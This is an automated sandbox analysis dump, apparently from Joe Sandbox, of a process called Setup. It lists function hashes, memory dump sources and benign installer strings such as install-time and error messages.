                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Initialize$CreateCriticalEventH_prolog3Section
                                                              • String ID:
                                                              • API String ID: 1191084466-0
                                                              • Opcode ID: 1a4c65e3bf8867ced9570f742c509014bcdd152872d35b811ebb32f0f4a04ff3
                                                              • Instruction ID: ed0bc53a5c23b35e9e9914040ad3078a92a787f260b67fac533e25bf3718f1b3
                                                              • Opcode Fuzzy Hash: 1a4c65e3bf8867ced9570f742c509014bcdd152872d35b811ebb32f0f4a04ff3
                                                              • Instruction Fuzzy Hash: A72126B0901201DFDB21CF5AC588996FBF8FFA5304B14846FE8998BA26C7B4C044CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C928E2F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID: EstimatedInstallTime$LogFileHint
                                                              • API String ID: 1663610674-3554194153
                                                              • Opcode ID: 03e5a085e7730599b77d14f744bd5c20b2d1a2fd53423ee49179d1f107cada5a
                                                              • Instruction ID: 3f123126e1d4837692de7a15532a4e8b72ce0e8b790f4db7c38031e88f893298
                                                              • Opcode Fuzzy Hash: 03e5a085e7730599b77d14f744bd5c20b2d1a2fd53423ee49179d1f107cada5a
                                                              • Instruction Fuzzy Hash: 429155B1601249DFEF14CFA8C981BD97BB4BF29308F1485AAE8589FB55C734DA04CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • schema validation failure: child element not found - , xrefs: 6C918E7D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: schema validation failure: child element not found -
                                                              • API String ID: 3670251406-3859288074
                                                              • Opcode ID: ab772aee5e9397744b5632ff1a953ac28bbcd2583367160b74b3cc02632ec5c7
                                                              • Instruction ID: b871e7d46f70383ed6194ff7efafef9b1a1a36740d8a181acaeec0caf0a6e62f
                                                              • Opcode Fuzzy Hash: ab772aee5e9397744b5632ff1a953ac28bbcd2583367160b74b3cc02632ec5c7
                                                              • Instruction Fuzzy Hash: FA717C7190524DDFCB05CFA4C944AEEBBB9BF65308F24454AE411EBB80CB70EA05DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932DC3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ImageName$ProcessBlock
                                                              • API String ID: 431132790-2988717093
                                                              • Opcode ID: 12dfb7f06deb5e585e7f7c4d3f18b35970ab4d83fa0663e9037525d768dd511f
                                                              • Instruction ID: 9055688548b56d0c8a5e8f879c797bb07459ff37609f25790757d976a4adb7b8
                                                              • Opcode Fuzzy Hash: 12dfb7f06deb5e585e7f7c4d3f18b35970ab4d83fa0663e9037525d768dd511f
                                                              • Instruction Fuzzy Hash: 1621627060120AEFDB14DFA8C945BAD7BB9BF15358F108558F424EBB81C770DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C937F72
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • _wcstoul.LIBCMT ref: 6C937FAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionException@8ThrowUser_wcstoul
                                                              • String ID: W
                                                              • API String ID: 3061576314-655174618
                                                              • Opcode ID: 40a8dd38b2ae70eb1e1233536a373d61579c6f4c808cdabee626ba31e8213c49
                                                              • Instruction ID: 498bcf57531f9a93cb87f9183d164f11800ccae1acda158cce9c2d58eddeda75
                                                              • Opcode Fuzzy Hash: 40a8dd38b2ae70eb1e1233536a373d61579c6f4c808cdabee626ba31e8213c49
                                                              • Instruction Fuzzy Hash: BB117076D00218EBDB00DFA5C844AEEF3B8FF14314F10456AE465A7641E774DA04CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C952E8A
                                                              • _wcstoul.LIBCMT ref: 6C952EF4
                                                                • Part of subcall function 6C96B6D0: wcstoxl.LIBCMT ref: 6C96B6E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_wcstoulwcstoxl
                                                              • String ID: 0x%x
                                                              • API String ID: 3147468384-1033910204
                                                              • Opcode ID: be7c87201e526445fb9f092c5664532c0af9dac820e7b64aa64258de25f80523
                                                              • Instruction ID: 684503e7eaedd4afcf5ffafaf677e1360507ba01d480cf70f738fc7cfbdb26d3
                                                              • Opcode Fuzzy Hash: be7c87201e526445fb9f092c5664532c0af9dac820e7b64aa64258de25f80523
                                                              • Instruction Fuzzy Hash: 29119EB2900208ABDB14DF64CC05BAE77B5BF21319F048516F804ABB90D775DE299BD9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95FC4D
                                                              • GetLastError.KERNEL32(?,?,?,6C95CE79,00000000,6C95BCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 6C95FC73
                                                              Strings
                                                              • Failed to record TimeToFirstWindow, xrefs: 6C95FC8D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: Failed to record TimeToFirstWindow
                                                              • API String ID: 685212868-1716191741
                                                              • Opcode ID: 217afc81af42677a2fe5d6c508dcb4f381f967795b08add01227817661c1e0e8
                                                              • Instruction ID: 548c84968fd5cf45db0e0fdf1811333eda7c6125f348139d56e3222f5eec75fa
                                                              • Opcode Fuzzy Hash: 217afc81af42677a2fe5d6c508dcb4f381f967795b08add01227817661c1e0e8
                                                              • Instruction Fuzzy Hash: 33016271201201ABD724CF65C905BA67B69AF653ACF50C528F815CBE80C734E515CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C914E11
                                                                • Part of subcall function 6C914FAC: _memset.LIBCMT ref: 6C914FB4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__memset
                                                              • String ID: %d.%d.%d$Error
                                                              • API String ID: 755347604-3400412798
                                                              • Opcode ID: affbdb768055e02d091b952b5d9eca25715c130edbc7406af007376b97e3cd77
                                                              • Instruction ID: 4e0867f1563df65391a7055f1de2550d82e7e5bd77cc94829d1c7d0f0f83a201
                                                              • Opcode Fuzzy Hash: affbdb768055e02d091b952b5d9eca25715c130edbc7406af007376b97e3cd77
                                                              • Instruction Fuzzy Hash: 62018B329101189BDF229B60CC117CCB3B5BF69308F040896E044A7F42D731DAA9CF84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • An internal or user error was encountered., xrefs: 6C914D6E
                                                              • A StopBlock was hit or a System Requirement was not met., xrefs: 6C914D77
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: A StopBlock was hit or a System Requirement was not met.$An internal or user error was encountered.
                                                              • API String ID: 431132790-2578323181
                                                              • Opcode ID: 450c3afbb1201a4ef82e83201e9a59d6bdfded082bf4f2ce42026ee51481893a
                                                              • Instruction ID: f351bb5aadefafbc463885c9e45d9bcc44cb19cedfafd303acffa2b73d7d2fb7
                                                              • Opcode Fuzzy Hash: 450c3afbb1201a4ef82e83201e9a59d6bdfded082bf4f2ce42026ee51481893a
                                                              • Instruction Fuzzy Hash: 41F0E5716506099BEB209B98C6057AC32646B6071EF004801E010AFFC0C7B9DA18CB9E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%